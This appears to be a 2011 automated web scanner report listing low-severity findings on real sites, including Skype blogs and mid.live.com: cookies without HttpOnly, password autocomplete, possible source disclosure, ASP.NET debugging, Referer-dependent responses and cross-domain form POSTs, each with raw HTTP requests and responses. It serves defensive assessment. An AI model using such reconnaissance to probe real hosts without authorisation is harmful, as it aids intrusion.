GET /pagead/aclk?sa=L&ai=Cr3NFq6RjTqDGGefoiAK0_eSmD8S6gssCrI_QwzuhzbWBDggAEAIoA1CF1JuQBGDJnv6GyKP8GqABvPiqzAPIAQGqBB9P0OACKPfGOZE474fyYYALAxyFDkPxCyIwI3XX4gluugUTCOjY8Pr-g6sCFfMrQgodiCMgqMoFAA&ei=qqRjTujbJPPXiAKIx4DBCg&ved=0CA0Q0Qw&val=ChAyNmVhN2ZlZjBhNmNmNDNiELDC9fIEGgjt108vSV8oOyABKAAw88uL57LFh-j1ATjy4fjyBECTyY7zBA&sig=AOD64_3dhBkP3lko1-av5PaHwMtErzeJiw&adurl=https://www14.software.ibm.com/webapp/iwm/web/signup.do%3Fsource%3Dswg-grd-q34Cyberthreats_web%26csr%3Dagust_itexpwebcast-20110816%26cm%3Dk%26cr%3Dgoogle%26ct%3D101CG4TW%26S_TACT%3D101CG4TW%26ck%3Dsecurity_in_web_application%26cmp%3D101CG%26mkwid%3Ds65PPPOzV_15893774852_432pjo10484 HTTP/1.1 Host: www.googleadservices.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.hl.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Houlihan Lo ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/ HTTP/1.1 Host: www.hlhz.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/ngsub1.gif HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: http://heartbeat.skype.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.newsgator.com Proxy-Connection: Keep-Alive
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password field with autocomplete enabled:
PasswordTextBox
Request
GET /si/login.aspx/x22 HTTP/1.1 Host: mid.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 2491 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Set-Cookie: lc=en-US; path=/ X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 04 Sep 2011 21:48:27 GMT Connection: close
The form contains the following password field with autocomplete enabled:
PasswordTextBox
Request
GET /si/login.aspx/x3c/cite/x3e/x3cspan HTTP/1.1 Host: mid.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 2560 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Set-Cookie: lc=en-US; path=/ X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 04 Sep 2011 21:48:29 GMT Connection: close
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
var r=true,t=null,B=false;window.PR_SHOULD_USE_CONTINUATION=r;window.PR_TAB_WIDTH=8;window.PR_normalizedHtml=window.PR=window.prettyPrintOne=window.prettyPrint=void 0;window._pr_isIE6=function(){var A ...[SNIP]... else for if return while case done elif esac eval fi function in local set then until ", hashComments:r,cStyleComments:r,multiLineStrings:r,regexLiterals:r}),J={};w(oa,["default-code"]);w(E([],[[C,/^[^<?]+/],["dec",/^<!\w[^>]*(?:>|$)/],[F,/^<\!--[\s\S]*?(?:-\->|$)/],["lang-",/^<\?([\s\S]+?)(?:\?>|$)/],["lang-",/^<%([\s\S]+?)(?:%>|$)/],[H,/^(?:<[%?]|[%?]> ...[SNIP]...
(function(){ var l, doAuth, h = [], valid = false, a = "", fwk = "http://platform.linkedin.com/js/framework?v=0.0.1132-RC3.9082-1337", xtnreg = /extensions=([^&]*)&?/, xtn ...[SNIP]... <?js ?>"; l=l.split(" "); var p=l[0]||"<?js",o=l[1]||"?>"; if(!p||!o){throw new Error("Template markers must be set.") }if(p==o){throw new Error("Start and end markers cannot be identical.") }p=new RegExp(b(p),"g"); o=new RegExp(b(o),"g"); var n=["","var p= ...[SNIP]...
14. ASP.NET debugging enabledpreviousnext There are 2 instances of this issue:
ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.
If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.
Issue remediation
To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.
It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.
ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.
ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /de/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:13 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 61616 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /developer/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:08 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 59562 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /developer/2011/03/longer_playtime_courtesy_of_si.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:11 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 60729 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /developer/2011/06/breaking_down_the_barriers_one.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:10 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 58059 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /developer/2011/06/bringing_video_to_the_next_wav.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:09 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 59244 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:03 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 230490 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:02 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 377860 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:00 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 594031 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:57 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 412787 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:56 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 362300 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:54 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 301665 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:52 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 342969 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/12/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:51 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 504735 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:48 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 341005 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:47 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 345891 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:45 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 403234 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:43 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 250170 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:41 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 790051 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:39 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 451171 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:37 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 338410 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:35 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 371498 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:33 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 248309 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:32 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 198595 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:30 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 351504 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/12/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:28 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 288676 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:27 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 242360 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:25 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 165110 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:24 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 228535 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:23 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 107509 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:22 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 262371 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:20 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 204711 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:19 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 170679 Connection: close Content-Type: text/html; charset=UTF-8
